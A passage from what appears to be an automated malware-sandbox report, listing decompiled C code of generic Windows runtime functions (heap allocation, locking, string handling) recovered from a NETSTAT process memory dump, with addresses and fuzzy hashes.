					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L02E9A840(__edx, __ecx, __ecx, _t52, 0x2f57b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x2f57b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x2f57b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x2f57b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L02E84620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x2f57b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E02EAF3E0(_t50,  *0x2f57b14, _t8 >> 3);
						_t28 =  *0x2f57b14; // 0x776f7b0c
						__eflags = _t28 - 0x2f57b0c;
						if(_t28 != 0x2f57b0c) {
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x2f57b14 = _t50;
						_t48 = _v12;
						 *0x2f57b10 = _t9;
						goto L6;
					}
					 *0x2f57b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x02e9a713
0x02e9a714
0x02e9a717
0x02e9a71d
0x02e9a720
0x02e9a722
0x02e9a727
0x02e9a74a
0x02e9a754
0x02e9a75e
0x02e9a768
0x02e9a76a
0x02e9a773
0x02e9a78b
0x02e9a790
0x02e9a792
0x02e9a741
0x02e9a741
0x02e9a743
0x02e9a749
0x02e9a749
0x02e9a732
0x02e9a73a
0x02e9a797
0x02e9a79d
0x02e9a7a3
0x02e9a7a9
0x02e9a7b6
0x02e9a7bc
0x02e9a7ca
0x02e9a7e0
0x02e9a7e2
0x02e9a7e4
0x02ed9bf2
0x00000000
0x02ed9bf2
0x02e9a7ed
0x02e9a7f2
0x02e9a800
0x02e9a805
0x02e9a80d
0x02e9a812
0x02ed9c08
0x02ed9c08
0x02e9a818
0x02e9a81b
0x02e9a821
0x02e9a824
0x00000000
0x02e9a824
0x02e9a7ae
0x00000000
0x02e9a7ae
0x02e9a73c
0x02e9a73e
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3f47893dc622c04694aec0de484efef88f8d49131622b6ac4ba33a0f32595a
Instruction ID: af62e0d1ebd27bb62761ded33799abf33b0d05e377fc23706cb9e42b8511e74c
Opcode Fuzzy Hash: 8b3f47893dc622c04694aec0de484efef88f8d49131622b6ac4ba33a0f32595a
Instruction Fuzzy Hash: 6731C5B1A80718AFD711EF08D891F55F7F5FB84758F148D6AE20587344D3719912CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E6AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E02E6AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x2f5d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x2f57b9c; // 0x0
					_t53 = L02E84620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E02EAB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E02EAF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L02E76C59(_t53, _t51, _t58) != 0) {
							_t28 = E02E95E50(0x2e4c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E02E9B230(_v32, _v28, 0x2e4c2d8, 1,  &_v24);
								_t28 = E02E6F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x02e6aa25
0x02e6aa29
0x02e6aa2d
0x02e6aa30
0x02e6aa37
0x02e6aa3c
0x02ec4458
0x02ec4458
0x02ec4472
0x02ec4474
0x02ec4476
0x02e6aa64
0x02e6aa74
0x02ec447c
0x02ec4483
0x02ec4492
0x02e6aa52
0x02e6aa54
0x02e6aa5e
0x02ec44a8
0x02ec44ad
0x02ec44af
0x02ec44b6
0x02ec44b6
0x02ec44b9
0x02ec44bc
0x02ec44cd
0x02ec44d3
0x02ec44d6
0x02ec44e1
0x02ec44e1
0x02ec44e6
0x02ec44e8
0x02ec44fb
0x02ec44fb
0x02ec44e8
0x00000000
0x02e6aa5e
0x02ec4476
0x02e6aa42
0x02e6aa46
0x02e6aa48
0x02e6aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99803657b8b338d46f872d8a800b5b4a1ea9b86dab5b99657c1ec61ebd7c468d
Instruction ID: ee19dd93230b422c627efa74c2cd95084c728dff72a77e03b8eb5de342c13958
Opcode Fuzzy Hash: 99803657b8b338d46f872d8a800b5b4a1ea9b86dab5b99657c1ec61ebd7c468d
Instruction Fuzzy Hash: E531E571A80219ABDF10AFA4CD51ABFB7B9FF04704B10946AF905EB240E7759D11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E961A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E02E961A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E02E95E50(0x2e467cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E02F39D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E02E6F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x02e961b3
0x02e961b5
0x02e961bd
0x02e961c3
0x02e961c7
0x02e961d2
0x02e961ff
0x02e961ff
0x02e96201
0x02e96207
0x02e96207
0x02e961d4
0x02e961d9
0x00000000
0x00000000
0x02e961df
0x02e961e2
0x00000000
0x00000000
0x02e961e6
0x02e961e8
0x02e961ee
0x02e961ee
0x02e961f9
0x02ed762f
0x02ed7632
0x02ed7635
0x02ed7639
0x02ed7640
0x02ed766e
0x02ed7675
0x00000000
0x00000000
0x02ed7681
0x02ed7689
0x02ed768d
0x02ed7691
0x02ed7695
0x02ed7699
0x02ed76af
0x02ed76b5
0x02ed76b7
0x02ed76b7
0x02ed76d7
0x02ed76dc
0x00000000
0x02ed76dc
0x02ed76a2
0x02ed76a9
0x02ed7651
0x02ed7653
0x02ed7653
0x02ed7656
0x02ed7656
0x00000000
0x02ed7656
0x02ed7644
0x02ed7646
0x02ed7648
0x02ed7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb65dfd29bb79ab3a2e4296975a96f4fe196a58fedee805a58cfce567c236259
Instruction ID: 1a0134864fa6d9050d17771ae1223d0c300b2be1119f5f53ad50fa6e746587ae
Opcode Fuzzy Hash: cb65dfd29bb79ab3a2e4296975a96f4fe196a58fedee805a58cfce567c236259
Instruction Fuzzy Hash: 0D3181716453018FD720CF19C940B26F7E9FB88B08F05996EF99997351E7B0E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02EA4A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02EA4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x2f5d360 ^ _t62;
				_v8 =  *0x2f5d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E02E82280(_t26, 0x2f58608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E02E7FFB0(_t41, _t51, 0x2f58608);
						L2:
						 *0x2f5b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E02EAB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E02E82280(_t28, 0x2f58608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E02E7FFB0(_t42, _t53, 0x2f58608);
							if(_t53 != 0) {
								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E02E7FFB0(_t41, _t51, 0x2f58608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x02ea4a2c
0x02ea4a34
0x02ea4a3c
0x02ea4a3e
0x02ea4a48
0x02ea4a4b
0x02ea4a4d
0x02ea4a51
0x02ea4a9c
0x00000000
0x00000000
0x02ea4aa3
0x02ea4aa8
0x02ea4aad
0x02ea4ab1
0x02ea4ade
0x02ea4ae3
0x02ea4a5a
0x02ea4a62
0x02ea4a6a
0x02ea4a6e
0x02edf203
0x02ea4a84
0x02ea4a88
0x02ea4a89
0x02ea4a8a
0x02ea4a95
0x02ea4a95
0x02ea4a79
0x02ea4a80
0x02ea4af2
0x02ea4af4
0x02ea4af9
0x02ea4aff
0x02ea4b01
0x02ea4b03
0x02ea4b08
0x02edf20a
0x02edf212
0x02edf216
0x02edf216
0x02ea4b08
0x02ea4b13
0x02ea4b1a
0x02edf229
0x02edf229
0x02ea4b1a
0x02ea4a82
0x00000000
0x02ea4a82
0x02ea4ab7
0x02ea4acd
0x02ea4acd
0x02ea4ad5
0x02ea4ada
0x00000000
0x02ea4ada
0x02ea4ac2
0x02ea4acb
0x00000000
0x00000000
0x00000000
0x02ea4acb
0x02ea4a53
0x02ea4a53
0x02ea4a58
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4922afc5cdd616132720ca0dc08ea9a4aad328b58df1e5ee3c0deb846e280eea
Instruction ID: 248a4cb609930f733fd0c1dde7609da9930ac66d5e9ed942bed19422b815504b
Opcode Fuzzy Hash: 4922afc5cdd616132720ca0dc08ea9a4aad328b58df1e5ee3c0deb846e280eea
Instruction Fuzzy Hash: F031D332285350DBDB21EF64C955B2ABBE5FF80758F01A519E95B4B680DBB0E840CF86

Uniqueness

Uniqueness Score: -1.00%

Function 02EA8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02EA8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x2f5d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E02E94E70(0x2f586e4, 0x2ea9490, 0, 0);
					if( *0x2f553e8 > 5 && E02EA8F33(0x2f553e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x2f553e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x2f553e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x2e4bc46;
						_t48 = E02EE7B9C(0x2f553e8, 0x2e4bc46, _t67, 0x2f553e8, _t70,  &_v140);
					}
				}
				return E02EAB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x02ea8ec7
0x02ea8ed9
0x02ea8edc
0x02ea8ee6
0x02ea8ee9
0x02ea8eee
0x02ea8efc
0x02ea8f08
0x02ee1349
0x02ee1353
0x02ee135d
0x02ee1366
0x02ee136f
0x02ee1375
0x02ee137c
0x02ee1385
0x02ee1390
0x02ee1391
0x02ee139c
0x02ee139d
0x02ee13a6
0x02ee13ac
0x02ee13b2
0x02ee13b5
0x02ee13bc
0x02ee13bf
0x02ee13c2
0x02ee13c5
0x02ee13c8
0x02ee13cb
0x02ee13ce
0x02ee13d1
0x02ee13d4
0x02ee13d7
0x02ee13da
0x02ee13dd
0x02ee13e0
0x02ee13e3
0x02ee13e6
0x02ee13e9
0x02ee13f6
0x02ee1400
0x02ee1400
0x02ea8f08
0x02ea8f32

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cd0b8b3e1f59442c34ff306535f9e11826e3ab4bb25ab8e43f96401f4eea3d0
Instruction ID: c0e9d42c09803c0f9ccef473ae7dae4efe6d169a195ac2a6087d860b985b1443
Opcode Fuzzy Hash: 5cd0b8b3e1f59442c34ff306535f9e11826e3ab4bb25ab8e43f96401f4eea3d0
Instruction Fuzzy Hash: 9E41A4B1D4032C9EDB14CF9AD981AAEFBF5FB48314F5081AEE519A7240E7705A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02E9E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E02E9E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E02EA9670() < 0) {
					L02EBDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x2f57b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L02E84620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M02E9E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x02e9e730
0x02e9e736
0x02e9e738
0x02e9e73d
0x02e9e73e
0x02e9e740
0x02e9e749
0x02e9e765
0x02e9e76a
0x02e9e76b
0x02e9e76c
0x02e9e76d
0x02e9e76e
0x02e9e76f
0x02e9e775
0x02e9e777
0x02e9e77e
0x02edb675
0x02e9e784
0x02e9e784
0x02e9e789
0x02e9e7a8
0x02e9e7ac
0x02e9e807
0x02e9e7ae
0x02e9e7ae
0x02e9e7b1
0x02e9e7b4
0x02e9e7b9
0x02e9e7c0
0x02e9e7c4
0x02e9e7ca
0x02e9e7cc
0x00000000
0x02e9e7d3
0x02e9e7d6
0x00000000
0x00000000
0x02e9e7ff
0x02e9e802
0x00000000
0x00000000
0x02e9e7f9
0x02e9e7fc
0x00000000
0x00000000
0x02e9e7f3
0x02e9e7f6
0x00000000
0x00000000
0x02e9e7ed
0x02e9e7f0
0x00000000
0x00000000
0x02e9e7e7
0x02e9e7ea
0x00000000
0x00000000
0x02edb685
0x02edb688
0x00000000
0x00000000
0x02edb682
0x00000000
0x00000000
0x02e9e7cc
0x02e9e7d9
0x02e9e7dc
0x02e9e7de
0x02e9e7de
0x02e9e7ac
0x02e9e7e4
0x02e9e74b
0x02e9e751
0x02e9e759
0x02e9e761
0x02e9e761

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc3a25d9e2c41bcb5ca6e37bab5a380309bac3024128ee19131b9bdfbd16c01
Instruction ID: 0c8299ebf37e63ec020270a9c9b3b045650e44bc838cd2bd2f67796c529bde43
Opcode Fuzzy Hash: 3dc3a25d9e2c41bcb5ca6e37bab5a380309bac3024128ee19131b9bdfbd16c01
Instruction Fuzzy Hash: 49318F75A54249EFDB04CF58C840B96B7E4FB09314F18925AFA08CB341E631E890CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E9BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02E9BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x2f56100; // 0xa
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E02E82280(0xd, 0xecaf1a0);
				_t41 =  *0x2f560f8; // 0x0
				if(_t41 != 0) {
					 *0x2f560f8 =  *_t41;
					 *0x2f560fc =  *0x2f560fc + 0xffff;
				}
				E02E7FFB0(_t41, 0x800, 0xecaf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x2f560f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L02E84620(0x2f56100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x2f56100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x02e9bc36
0x02e9bc42
0x02e9bc45
0x02e9bc4a
0x02e9bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x02e9bc50
0x02e9bc50
0x02e9bc58
0x02e9bc5a
0x02e9bc60
0x00000000
0x00000000
0x02eda4f2
0x02eda4f6
0x00000000
0x00000000
0x00000000
0x02eda4fc
0x02e9bc79
0x02e9bc7e
0x02e9bc86
0x02e9bd16
0x02e9bd20
0x02e9bd20
0x02e9bc8d
0x02e9bc94
0x02e9bcbd
0x02e9bcca
0x02e9bccb
0x02e9bccc
0x02e9bccd
0x02e9bcce
0x02e9bcd4
0x02e9bcea
0x02e9bcee
0x02e9bcf2
0x02e9bd00
0x02e9bd04
0x00000000
0x02e9bc96
0x02e9bcab
0x02e9bcaf
0x02e9bd2c
0x02e9bd2c
0x02e9bd09
0x00000000
0x02e9bd09
0x02e9bcb1
0x02e9bcb5
0x02e9bcbb
0x00000000
0x00000000
0x00000000
0x02e9bcbb

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1611f148eccbaa22601c06e37fc69d45719f93c905b6bce6928e867f016ce805
Instruction ID: 854e2d1ec46b07d469e25029a971f9d0e1a2993d444378f9ed4c7ef814f50f1b
Opcode Fuzzy Hash: 1611f148eccbaa22601c06e37fc69d45719f93c905b6bce6928e867f016ce805
Instruction Fuzzy Hash: B3312532A806259FCF01DF58E4807A6B3A8FF09319F41947AEE58DB201E774D946CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 02E69100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02E69100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x2f3f6e8);
				E02EBD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E02F388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E02EBD130(_t68, _t82, _t84);
				}
